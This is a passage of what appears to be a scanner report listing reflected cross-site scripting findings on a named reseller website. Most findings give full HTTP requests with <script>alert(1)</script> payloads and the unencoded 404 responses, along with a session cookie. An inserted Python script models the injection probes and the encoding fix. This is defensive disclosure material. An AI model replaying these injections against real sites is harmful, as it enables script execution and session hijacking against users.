This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes914ae<script>alert(1)</script>0b09a63bc0a/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes914ae<script>alert(1)</script>0b09a63bc0a/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.651. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cdf2<script>alert(1)</script>b047bd1718d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos9cdf2<script>alert(1)</script>b047bd1718d/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos9cdf2<script>alert(1)</script>b047bd1718d/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.652. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e00c1<script>alert(1)</script>767e1491ab8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagese00c1<script>alert(1)</script>767e1491ab8/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagese00c1<script>alert(1)</script>767e1491ab8/review/0.gif was not found on this server.</p>
...[SNIP]...

2.653. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f3a3f<script>alert(1)</script>9ad8eff08e7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/reviewf3a3f<script>alert(1)</script>9ad8eff08e7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/reviewf3a3f<script>alert(1)</script>9ad8eff08e7/0.gif was not found on this server.</p>
...[SNIP]...

2.654. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4a54b<script>alert(1)</script>cf67bf6e0f0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/0.gif4a54b<script>alert(1)</script>cf67bf6e0f0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/0.gif4a54b<script>alert(1)</script>cf67bf6e0f0 was not found on this server.</p>
...[SNIP]...

2.655. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e77f2<script>alert(1)</script>a8d24270aed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/0.gif?e77f2<script>alert(1)</script>a8d24270aed=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/0.gif?e77f2<script>alert(1)</script>a8d24270aed=1 was not found on this server.</p>
...[SNIP]...

2.656. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b9e6<script>alert(1)</script>2df774cfc94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication8b9e6<script>alert(1)</script>2df774cfc94/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication8b9e6<script>alert(1)</script>2df774cfc94/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.657. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51093<script>alert(1)</script>994575759a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content51093<script>alert(1)</script>994575759a/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content51093<script>alert(1)</script>994575759a/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.658. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1ead2<script>alert(1)</script>76ba99984bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes1ead2<script>alert(1)</script>76ba99984bc/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes1ead2<script>alert(1)</script>76ba99984bc/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.659. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ec26<script>alert(1)</script>195001ed063 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos3ec26<script>alert(1)</script>195001ed063/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos3ec26<script>alert(1)</script>195001ed063/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.660. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d8ca<script>alert(1)</script>b2f0fbf0c95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images8d8ca<script>alert(1)</script>b2f0fbf0c95/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images8d8ca<script>alert(1)</script>b2f0fbf0c95/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.661. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 62e94<script>alert(1)</script>c22470ce835 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review62e94<script>alert(1)</script>c22470ce835/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review62e94<script>alert(1)</script>c22470ce835/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.662. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8e92b<script>alert(1)</script>6167dfdf784 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php8e92b<script>alert(1)</script>6167dfdf784?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php8e92b<script>alert(1)</script>6167dfdf784?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.663. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4e4a4<a>b3f89c90ab9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search4e4a4<a>b3f89c90ab9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search4e4a4<a>b3f89c90ab9&opt=2 was not found on this server.</p>
...[SNIP]...
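The findings above all share one sink: whatever the request URI contains is echoed raw into the 404 page's "The requested URL ... was not found on this server." paragraph, so a payload appended to any path segment, or used as a query parameter name, lands unencoded in a text-node context. The script below is an added example, not the scanner's code or the site's. It rebuilds the observable part of the technique: inject a marker payload into the N-th path segment ("REST URL parameter N") or into a parameter name, then classify whether the response reflects it verbatim or HTML-encoded. The three render_404_* functions are constructed stand-ins for the site's 404 handler (vulnerable, blacklist-filtered, and fixed with contextual output encoding) so the whole thing runs offline; the "certain" versus "firm" rating mirrors the distinction the report draws between findings where a full `<script>` payload reflected and findings such as 2.663 where only a bare `<a>` tag did. Marker values and the assumed filter are invented for illustration.

```python
import html
import re
from urllib.parse import urlsplit, urlunsplit

# Path taken from the findings above; everything else in this file is constructed.
REPORT_PATH = "/communication/mobile-content/themes/kosmos/images/review/0.gif"


def inject_rest_param(url_path: str, index: int, payload: str) -> str:
    """Append *payload* to the *index*-th path segment (1-based), as the report's
    'REST URL parameter N' requests do, leaving any query string untouched.
    For REPORT_PATH, index 5 is 'images' and index 7 is '0.gif'."""
    parts = urlsplit(url_path)
    segments = parts.path.split("/")  # segments[0] == '' for the leading '/'
    if index < 1 or index >= len(segments):
        raise IndexError(f"path has {len(segments) - 1} segments, asked for {index}")
    segments[index] += payload
    return urlunsplit(parts._replace(path="/".join(segments)))


def inject_param_name(url_path: str, payload: str) -> str:
    """Add a query parameter whose *name* is the payload, value 1: the report's
    'name of an arbitrarily supplied request parameter' case."""
    sep = "&" if "?" in url_path else "?"
    return f"{url_path}{sep}{payload}=1"


def classify_reflection(body: str, payload: str) -> str:
    """'unencoded' if the payload is in the body verbatim, 'encoded' if only an
    HTML-escaped copy is, 'absent' otherwise."""
    if payload in body:
        return "unencoded"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


def _page(uri_markup: str) -> str:
    # Constructed 404 body shaped like the one quoted in the report.
    return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
            f"<p>The requested URL {uri_markup} was not found on this server.</p>"
            "</body></html>")


def render_404_vulnerable(request_uri: str) -> str:
    """Constructed stand-in for a 404 handler that echoes the request URI raw
    into a text node, the behaviour every finding above exhibits."""
    return _page(request_uri)


def render_404_scriptfilter(request_uri: str) -> str:
    """Constructed stand-in for a handler that strips <script> tags but nothing
    else: a blacklist that leaves the bare <a> probe intact (assumed filter)."""
    return _page(re.sub(r"(?i)</?script[^>]*>", "", request_uri))


def render_404_hardened(request_uri: str) -> str:
    """The fix: HTML-encode the untrusted URI for a text-node context before
    output. In PHP this is htmlspecialchars($uri, ENT_QUOTES, 'UTF-8')."""
    return _page(html.escape(request_uri, quote=True))


def assess(render, url_path: str, index: int) -> str:
    """Probe one REST URL parameter and rate it the way the report does:
    'certain' when a full <script> payload returns unencoded, 'firm' when only
    a bare <a> tag does, 'none' otherwise. *render* stands in for the HTTP
    round-trip (request URI in, response body out)."""
    for probe, rating in (("<script>alert(1)</script>", "certain"), ("<a>", "firm")):
        payload = f"5e1f2{probe}9c0de"  # fixed marker pair; a scanner randomises these
        body = render(inject_rest_param(url_path, index, payload))
        if classify_reflection(body, payload) == "unencoded":
            return rating
    return "none"


if __name__ == "__main__":
    for name, render in (("vulnerable", render_404_vulnerable),
                         ("script-filter", render_404_scriptfilter),
                         ("hardened", render_404_hardened)):
        ratings = [assess(render, REPORT_PATH, i) for i in range(1, 8)]
        print(f"{name:14s} REST params 1-7 -> {ratings}")
```

Two points for whoever triages these: a 404 status does not make the reflection harmless, since the browser renders the error body with the origin's privileges, and a "Firm" result on a parameter whose `<script>` probe went missing is exactly the blacklist situation the middle renderer models, so the right follow-up is to test tag and attribute variants rather than to downgrade the finding. The fix is the same for every entry in this series: encode the echoed URI for the HTML context it lands in, rather than filtering the input.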

2.664. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload da863<a>75c1d81939f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...da863<a>75c1d81939f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...da863<a>75c1d81939f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.665. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60882<script>alert(1)</script>d000d7b2976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&60882<script>alert(1)</script>d000d7b2976=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
